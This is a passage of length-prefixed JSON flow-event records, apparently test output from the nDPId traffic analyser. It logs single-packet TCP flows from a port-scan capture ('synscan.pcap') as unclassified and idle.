-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":35500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
